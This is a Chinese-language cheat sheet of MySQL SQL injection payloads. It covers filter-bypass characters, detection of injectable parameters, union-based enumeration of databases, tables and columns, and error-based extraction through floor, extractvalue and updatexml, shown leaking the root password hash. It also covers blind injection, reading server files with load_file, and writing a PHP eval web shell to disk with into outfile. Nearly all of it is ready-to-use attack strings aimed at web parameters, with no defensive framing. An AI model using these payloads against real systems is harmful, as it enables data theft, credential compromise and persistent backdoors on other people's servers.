mysql sql注入小结

特殊符号

注释符:#、 /*、— (后面加空格)
%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line
空格:使用/**/或()或+代替空格

系统数据库

mysql.user /*存储mysql数据库的用户及用户权限信息
information_schema.schemata /*存储mysql中所有数据库
information_schema.tables /*存储mysql中所有数据库的表
information_schema.columns /*存储mysql中所有数据库的列
information_schema.user_privileges /*存储mysql中所有数据库的权限信息

常用操作

常用语句:

select /*用于输出信息;select 列名|(数字|字符串|函数) as 别名(as可以省略)[from …],注意使用select 函数来输出内容
union /*联合操作符,注意前后列数相同,数据类型相差不大
group by /*分组
order by /*排序,order by 列名|列序号
case expr when a then a** when b then b* else c* end /*sql的switch语句
if(expr1, expr2, expr3) /*if函数,当expr1为真返回expr2否则返回expr3

常用函数(获取系统信息)

system_user() /*系统用户名
user() /*用户名
current_user() /*当前用户名
session_user() /*连接数据库的用户名
database() /*数据库名
version() /*MYSQL数据库版本
load_file() /*MYSQL读取本地文件的函数
@@datadir /*读取数据库路径
@@basedir MYSQL /*安装路径
@@version_compile_os /*操作系统

常用字符串函数

concat() /*连接字符串
group_concat()
concat_ws() /*连接字符串,第一个参数为分隔符
char() /*获得字符串
left(str, len) /*截取str左边len位
right(str, len) /*截取str右边len位
substring(str, pos, len) /*截取字符串
rand() /*生成0至1的随机数
floor(n) /*向下取整
name_conset(column_name, value) /*用来产生一个结果集合

其他

sleep(seconds) 停止seconds秒,用于time-based盲注
benchmark(times, function) 将function执行times次,该函数可用于time-based盲注,例如(benchmark(500000, encode(‘a’,’b')))
encode(str, passwd_str) 使用passwd_str加密str函数

判断是否可注入

使用单引号‘判断注入

http://aaa.com/s.php?id=1',如果返回页面提示syntax error,则说明有漏洞

通过附加逻辑运算判断注入

http://aaa.com/s.php?id=1 and 1=1/and 1=2,and 1=1有返回,and 1=2无返回

通过算数运算判断注入点

http://aaa.com/s.php?id=11-1

通过select语句判断注入点

http://aaa.com/s.php?id=(select 10)

通过时间函数判断注入点

http://aaa.com/s.php?id=2 and sleep(10)或者http://aaa.com/s.php?id=2 and benchmark(500000, encode('msg','bbb'))

常规注入

猜解列数

order by n /*

查询mysql基本信息

and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/*
例如:select * from sedb.site_tb where 1=2 union select 1,2,concat_ws(char(32,58,32),0x7c,user(),database(),version());

查询mysql数据库中有哪些数据库(注意使用limit限制查询的范围)

and 1=2 union select 1,schema_name,3,4 from information_schema.schemata/*
and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*
例如:select * from site_tb where 1=2 union select 1, 2, group_concat(schema_name) from information_schema.schemata;

查询某个数据库中有哪些表(数据库名可能需要16进制)

and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=数据库名
and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=数据库名
例如:select * from site_tb where 1=2 union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema='sedb';

查询某个表中有哪些字段(表名、数据库名可能需要16进制)

and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=表名 and table_schema=数据库名 limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=表名 and table_schema=数据库名/*
例如:select * from site_tb where 1=2 union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='site_tb' and table_schema='sedb';

查询数据

and 1=2 union select 1,2,3,字段1,5,字段2,7,8 from 数据库.表/*

mysql报错注入

利用floor报错(MySQL任意版本)

mysql> select user from user where user='root' and (select 1 from (select count(*),concat((select password from mysql.user where user='root' limit 1),0x20,floor(rand(0)*2))x from information_schema.tables group by x)a);
> ERROR 1062 (23000): Duplicate entry '*8D317C972E41BFE5109F28A34B644AFF3E3F99A5 1' for key 'group_key'

提示:不一定是 information_schema.tables 任何一张存在的表都行

mysql> select user from user where user='root' and (select count(*) from (select 1 union select null union select !1)x group by concat((select password from mysql.user where user='root' limit 1),0x20,floor(rand(0)*2)));
> ERROR 1062 (23000): Duplicate entry '*8D317C972E41BFE5109F28A34B644AFF3E3F99A5 1' for key 'group_key'

提示:一次只能有64位,分多次查询,且中文一个算两位

ExtractValue (未测试版本问题)

mysql> select user from user where user='root' and extractvalue(1,concat(0x5c,(select length(password) from user limit 1)));
> ERROR 1105 (HY000): XPATH syntax error: '\41'
mysql> select user from user where user='root' and extractvalue(1,concat(0x5c,(select mid(password,1,31) from user limit 1)));
> ERROR 1105 (HY000): XPATH syntax error: '\*8D317C972E41BFE5109F28A34B644A'
mysql> select user from user where user='root' and extractvalue(1,concat(0x5c,(select mid(password,32,31) from user limit 1)));
> ERROR 1105 (HY000): XPATH syntax error: '\FF3E3F99A5'

提示:只能显示32位,除去第一位,每次只能查31位,分多次查询

UpdateXml (>MySQL 5.1)

mysql> select * from mysql.user where user='root' and 1=(updatexml(1,concat(0x5e,(select mid(password,1,31) from mysql.user where user='root' limit 1)),1));
> ERROR 1105 (HY000): XPATH syntax error: '^*8D317C972E41BFE5109F28A34B644A'
mysql> select * from mysql.user where user='root' and 1=(updatexml(1,concat(0x5e,(select mid(password,32,31) from mysql.user where user='root' limit 1)),1));
> ERROR 1105 (HY000): XPATH syntax error: '^FF3E3F99A5'

提示:只能显示32位,除去第一位,每次只能查31位,分多次查询

name_const

mysql> select * from cms_votes where vid=1 and exists(select * from (select * from (select name_const(@@version,0))a join (select name_const(@@version,0)) b)c);
> ERROR 1060 (42S21): Duplicate column name '5.0.45-community-nt'

盲注(待完善)

利用and a=b盲注

?id=1 and substring(@@version,1,1)=5
?id=5 and (select 1 from users limit 0,1)=1 猜解users表是否存在
?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 猜解列名
?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

mysql读写文件

判断是否具有读写权限

and (select count(file_priv) from mysql.user)>0/*
and 1=2 union select 1,2, concat_ws(':', host, user, file_priv) from mysql.user/*
例如:select * from site_tb where 1=2 union select 1,2, concat_ws(':', host, user, file_priv) from mysql.user;

读文件

create table a(cmd text);
load data infile '/Users/apple/tmp/test.txt' into table a;
select * from a; /* mysql 3.x 5.x
create table a(cmd text);
insert into a(cmd) values(load_file('/Users/apple/tmp/test.txt'));
select * from a; /* mysql 3.x 4.x 5.x
and 1=2 union select 1, 2, concat(load_file('/Users/apple/tmp/test.txt'))
例如:select * from site_tb union select 1, 2, concat(load_file('/Users/apple/tmp/test.txt'));

写文件

union select 1,2,3,char(这里写入你转换成10进制或16进制的一句话木马代码),5,6,7,8,9,10,7 into outfile ‘d:\web\90team.php’/*s
union select 1,2,3,load_file(‘d:\web\logo123.jpg’),5,6,7,8,9,10,7 into outfile ‘d:\web\90team.php’/*
例如:select * from site_tb union select 1, 2, '<?php eval(\"_POST[\'test\']\”);?>' into outfile 'shell.php';

插入、更新数据

insert into user(username,password) values(‘xxxx’,’ xxxx’),(‘dddd’,’dddd’)/* ‘);
update table set column=value where **/*